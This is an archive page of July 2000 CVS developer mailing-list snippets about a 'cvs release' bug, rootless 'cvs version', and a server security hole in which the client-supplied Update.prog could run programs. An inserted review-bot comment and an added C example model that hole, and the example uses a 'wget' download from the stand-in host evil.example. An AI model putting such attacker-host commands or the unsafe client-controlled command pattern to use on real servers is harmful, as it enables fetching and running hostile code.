Re: CVS release and status commands

2000-07-28 Thread Anton Lavrentiev
Hi, "KOIE Hidetaka (鯉江英隆)" wrote: > > From: Anton Lavrentiev <[EMAIL PROTECTED]> > Subject: CVS release and status commands > Date: Fri, 28 Jul 2000 01:20:15 +0900 (JST) > > | It seems that there is a bug in the current CVS release, 1.10.8, which > | I have downloaded from www.cyc

Re: CVS release and status commands

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > I fail to repeat. The working directory is removed cleanly. The working directory is removed, but it is not removed from CVS/Entries in the parent directory (assuming the parent directory has a CVS/Entries file): * SCRIPT: foo #!/bin/sh DIR=`pwd`/repo [ -d $DIR ]

Re: cvs version w/o repository.

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > cvs version command may not access a repository. Why not? It doesn't seem like an unreasonable restriction to me. > "valid-requests" is used instead of "noop", > because "noop" command is not RQ_ROOTLESS. It would make more sense to change noop to be rootless. -Larr

RE: cvs version w/o repository.

2000-07-28 Thread 鯉江英隆
From: [EMAIL PROTECTED] (Larry Jones) Subject: Re: cvs version w/o repository. Date: Sat, 29 Jul 2000 00:18:32 +0900 (JST) | > cvs version command may not access a repository. | | Why not? It doesn't seem like an unreasonable restriction to me. Because: `cvs version' displays its ver

RE: CVS release and status commands

2000-07-28 Thread 鯉江英隆
I've understood. This is a quick fix: *** release.c.org Sat Jul 29 02:49:45 2000 --- release.c Sat Jul 29 02:49:45 2000 *** release (argc, argv) *** 268,273 --- 268,275 if (unlink_file_dir (thisarg) < 0) error (0, errno, "deletion of di
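Review bot: the hunk header (268,273 to 268,275) shows two lines added next to the unlink_file_dir (thisarg) error check, but the added lines themselves are cut off in this snippet, so the new behaviour cannot be reviewed from the hunk alone; whatever is inserted there to deregister the released directory from the parent CVS/Entries must, as the reply later in this thread points out, cope with thisarg being a path rather than a simple name, and must run on the client side as well, not only in the server process.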

RE: cvs version w/o repository.

2000-07-28 Thread Cameron, Steve
> From: [EMAIL PROTECTED] (Larry Jones) > Subject: Re: cvs version w/o repository. > Date: Sat, 29 Jul 2000 00:18:32 +0900 (JST) > > | > cvs version command may not access a repository. > | > | Why not? It doesn't seem like an unreasonable restriction to me. [smc] Wasn't "cvs

RE: cvs version w/o repository.

2000-07-28 Thread Cameron, Steve
I wrote: [...] > To see what version of CVS you're running locally, use "cvs -V" [smc] I meant "cvs -v"

Re: CVS release and status commands

2000-07-28 Thread Larry Jones
KOIE Hidetaka writes: > > I've understood. This is a quick fix: Too quick. It doesn't work if thisarg is a path rather than just a simple name, and it doesn't work client/server (it only does the deregister on the server). This is my quick fix which is similar but avoids the first problem. (L

Re: cvs version w/o repository.

2000-07-28 Thread Larry Jones
Cameron, Steve writes: > > [smc] Wasn't "cvs version" recently introduced precisely so that > you could > see what version of CVS the _remote_ repository was running? Yes, Hide-san's point was that you shouldn't have to specify a valid root directory on the server just to find out wh

[akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
This looks like a serious security problem. It appears to open anonymous CVS servers to a wide range of attack. Ian --- Start of forwarded message --- To: [EMAIL PROTECTED] Date: Fri, 28 Jul 2000 17:21:28 +0900 From: Tanaka Akira <[EMAIL PROTECTED]> Subject: cvs security pr

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Karl Fogel
Ian Lance Taylor <[EMAIL PROTECTED]> writes: > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It looks serious, but not for anonymous-only servers, since anonymous users can't commit. The hole here, I think, is that someone who

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Larry Jones
Ian Lance Taylor writes: > > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It's a known problem. Like it says in the Cederqvist manual (under "Security considerations with password authentication"): ... once a user ha

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
From: Karl Fogel <[EMAIL PROTECTED]> Date: 28 Jul 2000 14:01:23 -0500 Ian Lance Taylor <[EMAIL PROTECTED]> writes: > This looks like a serious security problem. It appears to open > anonymous CVS servers to a wide range of attack. It looks serious, but not for anonymous-only s

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Karl Fogel
Sorry -- good point. I'll look at it in detail when I'm looking at it in detail, which will be early next week. In the meantime, I'll keep my mouth shut. :-) -K Ian Lance Taylor <[EMAIL PROTECTED]> writes: >From: Karl Fogel <[EMAIL PROTECTED]> >Date: 28 Jul 2000 14:01:23 -0500 > >

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Pavel Roskin
Hello! On 28 Jul 2000, Karl Fogel wrote: > Sorry -- good point. I'll look at it in detail when I'm looking at it > in detail, which will be early next week. In the meantime, I'll keep > my mouth shut. :-) I hope that there is no immediate danger. Look at serve_update_prog() - it checks whethe

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Larry Jones
Ian Lance Taylor writes: > > What if I frob Update.prog? I don't claim to understand all the cases > here, but it appears that that will be run by `cvs update'. Update.prog just contains the name of the program to run, not the actual code. If you can't commit, you can't upload arbitrary code t

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: Fri, 28 Jul 2000 17:45:13 -0400 (EDT) From: [EMAIL PROTECTED] (Larry Jones) Ian Lance Taylor writes: > What if I frob Update.prog? I don't claim to understand all the cases > here, but it appears that that will be run by `cvs update'. Update.prog just contains the name

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT) From: Pavel Roskin <[EMAIL PROTECTED]> I hope that there is no immediate danger. Look at serve_update_prog() - it checks whether commits are allowed and exits if they are not. It prints a strange message though: E Flag -u in modules n

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Ian Lance Taylor
Date: 28 Jul 2000 14:58:08 -0700 From: Ian Lance Taylor <[EMAIL PROTECTED]> Date: Fri, 28 Jul 2000 17:36:53 -0400 (EDT) From: Pavel Roskin <[EMAIL PROTECTED]> I hope that there is no immediate danger. Look at serve_update_prog() - it checks whether commits are allow

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Pavel Roskin
> Update.prog just contains the name of the program to run, not the actual > code. If you can't commit, you can't upload arbitrary code to run, you > can only run pre-existing code on the server, and you have no control > over its input or arguments, so it's a very low-level threat. cat "wget ft
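The disagreement in the last few messages (a program name in Update.prog versus a command line the attacker fully controls) is easier to see in code. The following is an added example written for this page, not CVS source: it models a server that takes a client-supplied Update.prog line and splits it on whitespace into argv (an assumption about how such a line is turned into a command; no shell is involved in the model), beside a hardened variant that never consults the client line at all and only runs an administrator-configured program, and only for clients allowed to commit. The module name, the rebuild-site program, the wget command line and the scenario_* helpers are all hypothetical.

```c
/*
 * Added example (editor's model, not CVS source).  Shows why "Update.prog
 * only names a program" is not a safe property once the server tokenizes
 * that client-supplied line: the client also chooses every argument.
 * All names, paths and the lookup table below are hypothetical.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_ARGS 16
#define LINE_CAP 256

/* Split LINE on whitespace into argv, copying into BUF (caller-owned).
 * Returns argc, or -1 if the line is too long or has too many words. */
static int split_args(const char *line, char *buf, size_t buflen,
                      char **argv, int maxargs)
{
    size_t n = strlen(line);
    size_t i = 0;
    int argc = 0;

    if (n >= buflen || maxargs < 1)
        return -1;
    memcpy(buf, line, n + 1);
    while (i < n) {
        while (i < n && isspace((unsigned char)buf[i]))
            buf[i++] = '\0';
        if (i >= n)
            break;
        if (argc >= maxargs - 1)
            return -1;
        argv[argc++] = &buf[i];
        while (i < n && !isspace((unsigned char)buf[i]))
            i++;
    }
    argv[argc] = NULL;
    return argc;
}

/* Vulnerable model: program name AND arguments come straight from the
 * client's line.  "wget ftp://evil.example/x -O /tmp/x" becomes
 * argv = {"wget", "ftp://evil.example/x", "-O", "/tmp/x"}; nothing was
 * "uploaded", yet the client picked what runs and with which arguments. */
int plan_update_prog_unsafe(const char *client_line, char *buf, size_t buflen,
                            char **argv, int maxargs)
{
    return split_args(client_line, buf, buflen, argv, maxargs);
}

/* Hardened model: the client line is never read.  The command comes from
 * a server-side table keyed by the module the client asked for, and only
 * when the server permits this client to commit.  Returns argc, or -1
 * when nothing may run. */
struct server_prog { const char *module; const char *cmdline; };

int plan_update_prog_safe(int commits_allowed, const char *module,
                          const struct server_prog *table, size_t ntable,
                          char *buf, size_t buflen, char **argv, int maxargs)
{
    size_t k;
    if (!commits_allowed)            /* read-only (e.g. anonymous) client */
        return -1;
    for (k = 0; k < ntable; k++)
        if (strcmp(table[k].module, module) == 0)
            return split_args(table[k].cmdline, buf, buflen, argv, maxargs);
    return -1;                       /* no admin-configured program */
}

/* Constructed inputs for the scenarios below. */
static const char EVIL_LINE[] = "wget ftp://evil.example/x -O /tmp/x";
static const struct server_prog TABLE[] = {
    { "www", "/usr/local/bin/rebuild-site www" },   /* hypothetical */
};

int scenario_unsafe_argc(void)
{
    char buf[LINE_CAP]; char *argv[MAX_ARGS];
    return plan_update_prog_unsafe(EVIL_LINE, buf, sizeof buf, argv, MAX_ARGS);
}

int scenario_unsafe_runs_wget(void)
{
    char buf[LINE_CAP]; char *argv[MAX_ARGS];
    int argc = plan_update_prog_unsafe(EVIL_LINE, buf, sizeof buf, argv, MAX_ARGS);
    return argc > 0 && strcmp(argv[0], "wget") == 0;
}

int scenario_safe(int commits_allowed, const char *module)
{
    char buf[LINE_CAP]; char *argv[MAX_ARGS];
    return plan_update_prog_safe(commits_allowed, module, TABLE,
                                 sizeof TABLE / sizeof TABLE[0],
                                 buf, sizeof buf, argv, MAX_ARGS);
}

int main(void)
{
    printf("unsafe: argc=%d, runs wget=%d\n",
           scenario_unsafe_argc(), scenario_unsafe_runs_wget());
    printf("safe, anonymous client: %d\n", scenario_safe(0, "www"));
    printf("safe, committer, module www: argc=%d\n", scenario_safe(1, "www"));
    printf("safe, committer, unknown module: %d\n", scenario_safe(1, "other"));
    return 0;
}
```

The hardened variant is one illustration of the "don't take the program from the client" direction the thread gestures at (the simplest fix mentioned later being to drop checkin and update programs altogether); it deliberately ignores the client line rather than trying to sanitize it, since any tokenizer that keeps the client's words keeps the client's arguments.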

Re: [akr@M17N.ORG: cvs security problem]

2000-07-28 Thread Mike Castle
On Fri, Jul 28, 2000 at 05:20:13PM -0400, Larry Jones wrote: >-- the simplest fix would > be to just get rid of checkin and update programs, but I'm not sure how > people would feel about that. It would probably remove any chance I have of getting t